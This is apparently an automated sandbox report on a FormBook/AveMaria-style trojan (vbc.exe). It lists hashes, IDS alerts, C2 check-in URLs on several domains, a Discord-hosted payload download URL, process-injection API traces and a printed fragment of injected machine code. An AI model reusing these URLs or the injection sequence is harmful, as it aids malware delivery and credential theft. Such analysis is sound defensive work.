popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

vbc.exe

Malicious Library UPX PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 28, 2021, 9:30 a.m. July 28, 2021, 9:34 a.m.
Size 664.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 18e38eae3d407418b879271c9b5736bd
SHA256 38ba862149962bc5a10825a2b818391624cda439fcb3f6212b75d84eeeb4f70c
CRC32 90A65266
ssdeep 12288:mDPmOzS2AO+GBDfNj/nNImvYGU3F4JDW6xpYMeAEGGQPN+BRKa:0eJ2Aq9p/nWmwG845W6xKMeWP
Yara
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49201 -> 162.159.134.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 162.159.134.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 64.34.75.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 64.34.75.141:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 64.34.75.141:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 88.214.207.96:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 88.214.207.96:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 88.214.207.96:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.109.22.100:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.109.22.100:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.109.22.100:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 182.50.132.242:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 182.50.132.242:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 182.50.132.242:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49200
162.159.134.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.101:49201
162.159.134.233:443 		None None None

section .itext
packer BobSoft Mini Delphi -> BoB / BobSoft
resource name RDTA
suspicious_features GET method with no useragent header suspicious_request GET http://www.brightimewatches.com/bsk9/?t8o4nPp=kaXVI8mGssjTav/La5mnkdXKeQWIgX/VfzBlfkVGxIFVCgMTzil3/n4Sv05bj+iGu4kpHiKs&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.designtechnician.com/bsk9/?t8o4nPp=TvVK73TRf5j6s1n7h7T5c3CBRbgVn1dkElf2PsyhDBWyU3z8P+JBq7DG4FpqoYni6N2IZF7Y&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.mycupofteainnovations.com/bsk9/?t8o4nPp=Si5ZJRft9DXQG2cDg3004meRUKMojHlA9AsgkzbvAOzWsE4N89OHu/2KBDAzoyeOENkp7ks8&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.texttalktv.com/bsk9/?t8o4nPp=1ZhD0vtF2duhbIhiPjCtKCwSgB3qgGhCJxQx1JqwbXK1OmkrsYZcetPPHcWMEPEbw96IhHtQ&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.ds-117.com/bsk9/?t8o4nPp=hooPU96Upk2pq/4iMoeF2F/+J701iyWmziTSNhhyumhkPjSDDokaN9dimgHfx2T3RL15aR4L&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.tombison.com/bsk9/?t8o4nPp=ogtt1MRFxFLond3QItB5pQGTqAA1l5pj16H7SQAv8iWZ8sAVaMDbEFV2t+4JtDPR25+GXpiQ&jPj8q=Klh8
request POST http://www.brightimewatches.com/bsk9/
request GET http://www.brightimewatches.com/bsk9/?t8o4nPp=kaXVI8mGssjTav/La5mnkdXKeQWIgX/VfzBlfkVGxIFVCgMTzil3/n4Sv05bj+iGu4kpHiKs&jPj8q=Klh8
request POST http://www.designtechnician.com/bsk9/
request GET http://www.designtechnician.com/bsk9/?t8o4nPp=TvVK73TRf5j6s1n7h7T5c3CBRbgVn1dkElf2PsyhDBWyU3z8P+JBq7DG4FpqoYni6N2IZF7Y&jPj8q=Klh8
request POST http://www.mycupofteainnovations.com/bsk9/
request GET http://www.mycupofteainnovations.com/bsk9/?t8o4nPp=Si5ZJRft9DXQG2cDg3004meRUKMojHlA9AsgkzbvAOzWsE4N89OHu/2KBDAzoyeOENkp7ks8&jPj8q=Klh8
request POST http://www.texttalktv.com/bsk9/
request GET http://www.texttalktv.com/bsk9/?t8o4nPp=1ZhD0vtF2duhbIhiPjCtKCwSgB3qgGhCJxQx1JqwbXK1OmkrsYZcetPPHcWMEPEbw96IhHtQ&jPj8q=Klh8
request POST http://www.ds-117.com/bsk9/
request GET http://www.ds-117.com/bsk9/?t8o4nPp=hooPU96Upk2pq/4iMoeF2F/+J701iyWmziTSNhhyumhkPjSDDokaN9dimgHfx2T3RL15aR4L&jPj8q=Klh8
request POST http://www.tombison.com/bsk9/
request GET http://www.tombison.com/bsk9/?t8o4nPp=ogtt1MRFxFLond3QItB5pQGTqAA1l5pj16H7SQAv8iWZ8sAVaMDbEFV2t+4JtDPR25+GXpiQ&jPj8q=Klh8
request GET https://cdn.discordapp.com/attachments/862558875870036001/869107915900989440/Mnwgrkqawpzldlsoxhgayuiojpposxx
request POST http://www.brightimewatches.com/bsk9/
request POST http://www.designtechnician.com/bsk9/
request POST http://www.mycupofteainnovations.com/bsk9/
request POST http://www.texttalktv.com/bsk9/
request POST http://www.ds-117.com/bsk9/
request POST http://www.tombison.com/bsk9/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1868
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1868
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10410000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1868
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 94208
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x04281000
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x0002fa00', u'virtual_address': u'0x00080000', u'entropy': 7.032519103704735, u'name': u'.rsrc', u'virtual_size': u'0x0002f8f8'} entropy 7.0325191037 description A section with a high entropy has been found
entropy 0.287113790505 description Overall entropy of this PE file is high
buffer Buffer with sha1: d676fda316250913d7d91b30ba44149d7ce44c4d
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 556
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10410000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
1 0 0

NtAllocateVirtualMemory

 process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
1 0 0

NtAllocateVirtualMemory

 process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
1 0 0
Process injection Process 1868 created a remote thread in non-child process 556
Time & API Arguments Status Return Repeated

CreateRemoteThread

 thread_identifier: 1812
process_identifier: 556
function_address: 0x00100000
flags: 0
stack_size: 0
parameter: 0x000f0000
process_handle: 0x00000530
1 1332 0
Process injection Process 1868 manipulating memory of non-child process 556
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 556
region_size: 163840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10410000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
1 0 0

NtAllocateVirtualMemory

 process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
1 0 0

NtAllocateVirtualMemory

 process_identifier: 556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000530
1 0 0
Process injection Process 1868 injected into non-child 556
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: APÐB
base_address: 0x000f0000
process_identifier: 556
process_handle: 0x00000530
1 1 0

WriteProcessMemory

 buffer: U‹ìƒÄø‹E‹‰Uø‹P‰Uü1ÀPjÿuøÿUüYY]@U‹ìƒÄÔSVW‹ú‹ðEԋô?)è5ÿÿ3ÀUh½H)dÿ0d‰ ÆEÿ‹G<ljEô»Ãj@h0‹Eô‹@PP‹Eô‹@4ÃPèÿÿ‰Eðƒ}ðt0h€j‹EðPèÿÿj@h0‹Eô‹@PP‹Eô‹@4ÃPVèâÿÿ‰Eðƒ}ðuû0v—EÔP‹Ï‹Uð‹Æ蝋EԅÀt7‰Eè‹Uà‰UìUøR‹UØRP‹EðPVèÖÿÿjjM躈G)‹Æè_ýÿÿ…ÀtÆEÿ3ÀZYYd‰hÄH)Eԋô?)èÿÿÃ
base_address: 0x00100000
process_identifier: 556
process_handle: 0x00000530
1 1 0
process vbc.exe useragent zipo
process vbc.exe useragent aswe
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.395374
FireEye Gen:Variant.Zusy.395374
Cybereason malicious.a46738
Cyren W32/Trojan.QUFK-1166
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.EPVD
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.Win32.AveMaria.gen
BitDefender Gen:Variant.Zusy.395374
Avast Win32:Malware-gen
Ad-Aware Gen:Variant.Zusy.395374
Sophos ML/PE-A
DrWeb Trojan.DownLoader40.49340
McAfee-GW-Edition Fareit-FCVN!18E38EAE3D40
Emsisoft Gen:Variant.Zusy.395374 (B)
Microsoft Trojan:Win32/AVeMariaRAT.RVA!MTB
GData Gen:Variant.Zusy.395374
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4567571
McAfee Fareit-FCVN!18E38EAE3D40
MAX malware (ai score=80)
VBA32 Exploit.UAC
eGambit Unsafe.AI_Score_99%
Fortinet W32/Injector.EPVD!tr
BitDefenderTheta Gen:NN.ZelphiF.34050.PKW@a0VMAsbi
AVG Win32:Malware-gen
Panda Trj/GdSda.A